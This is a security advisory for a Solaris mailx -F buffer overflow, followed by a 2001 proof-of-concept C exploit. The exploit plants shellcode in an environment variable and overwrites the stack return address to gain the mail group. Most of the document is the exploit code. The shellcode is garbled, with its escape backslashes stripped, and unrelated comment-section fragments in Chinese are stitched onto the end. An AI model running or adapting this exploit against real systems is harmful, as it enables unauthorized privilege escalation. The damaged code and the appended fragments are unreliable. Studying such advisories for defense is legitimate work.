source: http://www.securityfocus.com/bid/2610/info
Solaris is the variant of the UNIX Operating System distributed by Sun Microsystems. Solaris is designed as a scalable operating system for the Intel x86 and Sun Sparc platforms, and operates on machines varying from desktop to enterprise server.
A problem with the handling of a long string of characters by the -F option makes it possible for a local user to gain elevated privileges. Due to the insufficient handling of input by the -F option of mailx, a buffer overflow at 1150 characters makes it possible to overwrite variables on the stack, including the return address.
This problem makes it possible for a local user gain elevated privileges, attaining an effective GID of mail.
#include <fcntl.h>
/*
/usr/bin/mailx overflow proof of conecpt.
Pablo Sor, Buenos Aires, Argentina 04/2001
[email protected], [email protected]
works against x86 solaris 8
default offset should work.
usage:
bash$ id
uid=100(laika) gid=1(other)
bash$ ./mailx-exp
Subject: tomy
.
EOT
[wait...]
$ id
uid=100(laika) gid=1(other) egid=6(mail)
*/
long get_esp() { __asm__("movl %esp,%eax"); }
int main(int ac, char **av)
{
char shell[]=
"xebx1cx5ex33xc0x33xdbxb3x08xfexc3x2bxf3x88x06"
"x6ax06x50xb0x88x9axffxffxffxffx07xeexebx06x90"
"xe8xdfxffxffxffx55x8bxecx83xecx08xebx5dx33xc0"
"xb0x3axfexc0xebx16xc3x33xc0x40xebx10xc3x5ex33"
"xdbx89x5ex01xc6x46x05x07x88x7ex06xebx05xe8xec"
"xffxffxffx9axffxffxffxffx0fx0fxc3x5ex33xc0x89"
"x76x08x88x46x07x33xd2xb2x06x02xd2x89x04x16x50"
"x8dx46x08x50x8bx46x08x50xe8xb5xffxffxffx33xd2"
"xb2x06x02xd2x03xe2x6ax01xe8xafxffxffxffx83xc4"
"x04xe8xc9xffxffxffx2fx74x6dx70x2fx78x78";
unsigned long magic = get_esp() + 2075; /* default offset */
unsigned char buf[1150];
char *envi;
envi = (char *)malloc(300*sizeof(char));
memset(envi,0x90,300);
memcpy(envi+280-strlen(shell),shell,strlen(shell));
memcpy(envi,"SOR=",4);
envi[299]=0;
putenv(envi);
symlink("/bin/ksh","/tmp/xx");
memset(buf,0x41,1150);
memcpy(buf+1116,&magic,4);
buf[1149]=0;
execl("/usr/bin/mailx","mailx","-F",buf,NULL);
}
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666